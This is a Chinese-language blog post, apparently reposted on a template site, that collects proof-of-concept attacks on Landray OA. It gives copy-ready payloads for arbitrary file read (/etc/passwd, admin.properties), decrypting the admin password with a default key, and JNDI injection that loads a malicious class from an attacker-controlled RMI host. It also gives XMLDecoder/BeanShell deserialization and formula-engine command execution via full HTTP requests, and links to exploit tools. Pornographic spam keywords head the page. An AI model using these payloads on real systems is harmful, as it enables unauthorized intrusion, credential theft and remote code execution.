国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

藍凌(Landray)OA漏洞常見RCE

這篇具有很好參考價值的文章主要介紹了藍凌(Landray)OA漏洞常見RCE。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

前言

背景是由于一次和友商共同的滲透項目測試中,其中一個系統(tǒng)使用了藍凌OA,但當時由于一些原因覺得版本挺新應(yīng)該是打了補丁的故在測試中沒有仔細遍歷復(fù)現(xiàn)藍凌OA的歷史常見RCE漏洞,后續(xù)對比了友商的報告發(fā)現(xiàn)別人測的兩個RCE,故統(tǒng)一做個poc積累學(xué)習(xí),混個眼熟防止下次滲透或攻防時漏掉。

任意文件讀取漏洞

漏洞描述

藍凌OA(EKP)存在任意文件讀取漏洞可能導(dǎo)致敏感信息泄露。

漏洞復(fù)現(xiàn)

漏洞路徑:/sys/ui/extend/varkind/custom.jsp,訪問后抓包,在body中加入payload:var={“body”:{“file”:“file:///etc/passwd”}},發(fā)送post請求。
藍凌(Landray)OA漏洞常見RCE

SSRF+JNDI遠程命令執(zhí)行

漏洞描述

配合上述任意文件讀取漏洞獲取敏感信息,讀取配置文件得到密鑰后訪問 admin.do 可利用 JNDI遠程命令執(zhí)行獲取權(quán)限。

漏洞復(fù)現(xiàn)

利用任意文件讀取/WEB-INF/KmssConfig/admin.properties配置文件
藍凌(Landray)OA漏洞常見RCE由此獲得加密的password,據(jù)說藍凌OA默認為DES加密,且有個默認密鑰為 kmssAdminKey,可以拿著password在在線網(wǎng)站上嘗試解密(返回的password字符串去掉末尾的/r在進行解密)
藍凌(Landray)OA漏洞常見RCE用解密出來的明文密碼嘗試登錄后臺地址:admin.do,此地址也可能由爆破得到:
藍凌(Landray)OA漏洞常見RCE藍凌(Landray)OA漏洞常見RCEburp抓包,body添加payload:method=testDbConn&datasource=rmi://vpsip:port/exp,exp構(gòu)造同常見的如fastjson所用:
藍凌(Landray)OA漏洞常見RCE寫入想執(zhí)行的命令并編譯成惡意類(編譯兼容java1.7)后放到web服務(wù)器上。再使用marshalsec工具(https://github.com/mbechler/marshalsec)構(gòu)建一個JNDI服務(wù)。
藍凌(Landray)OA漏洞常見RCE發(fā)送payload:
藍凌(Landray)OA漏洞常見RCE

sysSearchMain.do XMLdecode反序列化(任意文件寫入)

漏洞描述

sysSearchMain.do文件,存在任意文件寫入漏洞,攻擊者獲取后臺權(quán)限后可通過漏洞寫入任意文件,也可以通過 custom.jsp 文件未授權(quán)寫入惡意文件,導(dǎo)致RCE。

漏洞復(fù)現(xiàn)

若通過custom.jsp寫入,payload為:var={“body”:{“file”:“/sys/search/sys_search_main/sysSearchMain.do?method=editParam”}}&fdParemNames=11&fdParameters=[shellcode]
shellcode:<java> <void class="com.sun.org.apache.bcel.internal.util.ClassLoader"> <void method="loadClass"> <string>$$BCEL$$......</string> <void method="newInstance"></void> </void> </void> </java> //使用了BCEL利用鏈(BCEL包下的ClassLoader類)
同上一漏洞一樣編譯惡意exp類//不要使用java8u251以后版本
藍凌(Landray)OA漏洞常見RCE使用BCEL編碼工具:https://github.com/Xd-tl/BCELCode
插入發(fā)送:
藍凌(Landray)OA漏洞常見RCE漏洞成因?qū)dParameters參數(shù)過濾不嚴,傳給ojectXmlDecoder造成反序列化。
tips:如果OA存在bsh可直接執(zhí)行命令,可直接回顯或打入內(nèi)存馬,或者后臺洞情況,web管理員權(quán)限添加反序列化白名單:如bsh.Intepreter(BeanShell利用鏈中bash.Interpreter的eval方法)
藍凌(Landray)OA漏洞常見RCEpayload:var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void class="bsh.Interpreter"><void method="eval"><string>Runtime.getRuntime().exec("calc");</string></void></void></java>
回顯payload:
藍凌(Landray)OA漏洞常見RCE//太菜了不懂回顯payload細節(jié)

公式編輯器RCE

漏洞描述

dataxml.jsp 、treexml.tmpl等代碼執(zhí)行

漏洞復(fù)現(xiàn)

漏洞地址:/data/sys-common/treexml.tmpl、 /sys/common/dataxml.jsp、 /sys/common/treexml.jsp、 /sys/common/treejson.jsp、 /sys/common/datajson.jsp、 /data/sys-common/dataxml、 /data/sys-common/treexml、 /data/sys-common/datajson
以上地址都可以嘗試一下
payload如:

POST /sys/ui/extend/varkind/custom.jsp  HTTP/1.1
Host: test.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 176

var={"body":{"file":"/data/sys-common/datajson"}}&s_bean=sysFormulaValidateByJS&script=new java.lang.ProcessBuilder['(java.lang.String[])'](['sh','-c','touch /tmp/1']).start();

s_bean或為RuleFormulaValidate對應(yīng)treexml.tmplsysFormulaValidateByJS
具體原理和利用區(qū)別可查看https://unsafe.sh/go-123305.html
最后再放一個OA集合利用的工具:https://github.com/LittleBear4/OA-EXPTOOL
藍凌(Landray)OA漏洞常見RCE文章來源地址http://www.zghlxwxcb.cn/news/detail-403811.html

到了這里,關(guān)于藍凌(Landray)OA漏洞常見RCE的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 藍凌EIS pdf.aspx 任意文件讀取漏洞

    藍凌EIS pdf.aspx 任意文件讀取漏洞

    漏洞描述: 藍凌EIS智慧協(xié)同平臺是一個簡單、高效的工作方式專為成長型企業(yè)打造的溝通、協(xié)同、社交的移動辦公平臺,覆蓋OA、溝通、客戶、人事、知識等管理需求,集合了非常豐富的模塊,滿足組織企業(yè)在知識、項目管理系統(tǒng)建設(shè)等需求的一款OA系統(tǒng)。 漏洞描述 藍凌EI

    2024年01月16日
    瀏覽(28)
  • 藍凌EIS智慧協(xié)同平臺saveImg接口存在任意文件上傳漏洞

    藍凌EIS智慧協(xié)同平臺saveImg接口存在任意文件上傳漏洞

    免責(zé)聲明:請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負責(zé),所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。 藍凌智慧協(xié)同平臺eis集合了非常豐富的模塊

    2024年02月08日
    瀏覽(22)
  • 藍凌EIS智慧協(xié)同平臺 frm_form_upload.aspx 文件上傳漏洞復(fù)現(xiàn)

    藍凌EIS智慧協(xié)同平臺 frm_form_upload.aspx 文件上傳漏洞復(fù)現(xiàn)

    藍凌EIS智慧協(xié)同平臺是一款專為企業(yè)提供高效協(xié)同辦公和團隊合作的產(chǎn)品。該平臺集成了各種協(xié)同工具和功能,旨在提升企業(yè)內(nèi)部溝通、協(xié)作和信息共享的效率。 藍凌EIS智慧協(xié)同平臺?frm_form_upload.aspx接口處存在任意文件上傳漏洞,未經(jīng)過身份認證的攻擊者可通過構(gòu)造壓縮文

    2024年01月23日
    瀏覽(23)
  • 藍凌EIS智慧協(xié)同平臺 doc_fileedit_word.aspx 存在 SQL注入漏洞

    藍凌EIS智慧協(xié)同平臺 doc_fileedit_word.aspx 存在 SQL注入漏洞

    產(chǎn)品簡介 藍凌EIS智慧協(xié)同平臺是一款專為企業(yè)提供高效協(xié)同辦公和團隊合作的產(chǎn)品。該平臺集成了各種協(xié)同工具和功能,旨在提升企業(yè)內(nèi)部溝通、協(xié)作和信息共享的效率。 漏洞概述 由于藍凌EIS智慧協(xié)同平臺 doc_fileedit_word.aspx接口處未對用戶輸入的SQL語句進行過濾或驗證導(dǎo)致

    2024年01月25日
    瀏覽(15)
  • 【漏洞復(fù)現(xiàn)-通達OA】通達OA share身份認證繞過漏洞

    【漏洞復(fù)現(xiàn)-通達OA】通達OA share身份認證繞過漏洞

    通達OA(Office Anywhere網(wǎng)絡(luò)智能辦公系統(tǒng))是中國通達公司的一套協(xié)同辦公自動化軟件。通達OA /share/handle.php存在一個認證繞過漏洞,利用該漏洞可以實現(xiàn)任意用戶登錄。攻擊者可以通過構(gòu)造惡意攻擊代碼,成功登錄系統(tǒng)管理員賬戶,繼而在系統(tǒng)后臺上傳惡意文件控制網(wǎng)站服務(wù)器

    2024年02月19日
    瀏覽(70)
  • thinkphp 5-rce(rce漏洞getshell)

    thinkphp 5-rce(rce漏洞getshell)

    ?vulhub靶場 http://xxxxx:8080/?s=/Index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami ?驗證漏洞 linux系統(tǒng),可以用touch命令創(chuàng)建文件 http://xxxxx:8080/?s=/Index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]= touch mm.php 再用echo寫入一句話 http://xxxxx:8080/index.

    2024年02月14日
    瀏覽(45)
  • 【漏洞復(fù)現(xiàn)-通達OA】通達OA get_contactlist.php 敏感信息泄漏漏洞

    【漏洞復(fù)現(xiàn)-通達OA】通達OA get_contactlist.php 敏感信息泄漏漏洞

    通達OA get_contactlist.php文件存在信息泄漏漏洞,攻擊者通過漏洞可以獲取敏感信息,進一步攻擊。 ● 通達OA2013 ● hunter app.name=\\\"通達 OA\\\" ● 特征 四、漏洞復(fù)現(xiàn)

    2024年02月20日
    瀏覽(17)
  • 【漏洞復(fù)現(xiàn)-通達OA】通達OA get_file.php 任意文件下載漏洞

    【漏洞復(fù)現(xiàn)-通達OA】通達OA get_file.php 任意文件下載漏洞

    通達OA get_file.php文件存在任意文件下載漏洞,攻擊者通過漏洞可以讀取服務(wù)器敏感文件。 ● 通達OA2011 ● hunter app.name=\\\"通達 OA\\\" ● 特征

    2024年02月21日
    瀏覽(132)
  • Spring RCE漏洞

    目錄 Spring RCE漏洞 一、漏洞概況與影響 二、Spring動態(tài)參數(shù)綁定 三、漏洞復(fù)現(xiàn) 四、漏洞原理 五、漏洞排查和修復(fù) CVE編號:CVE-2022-22965 受影響范圍: Spring Framework 5.3.X 5.3.18 Spring Framework 5.2.X 5.2.20 JDK =9 使用Tomcat中間件且開啟了Tomcat日志記錄的應(yīng)用系統(tǒng) 將HTTP請求中的的請求參數(shù)

    2024年02月01日
    瀏覽(21)
  • phpstudy 最新 RCE漏洞

    phpstudy 最新 RCE漏洞

    突然看到這個漏洞,所以起來復(fù)現(xiàn)一下,其實沒有什么技巧和經(jīng)驗可言,就是一個xss+csrf的RCE。 本文僅供參考,請勿用于非法用途 環(huán)境部署可以參考:https://www.xp.cn/linux.html#install-show 我是直接用kali部署的,相當于是unbantu。 先來看xss,正常的登錄測試 scriptalert(1)/script 因為在

    2024年02月05日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包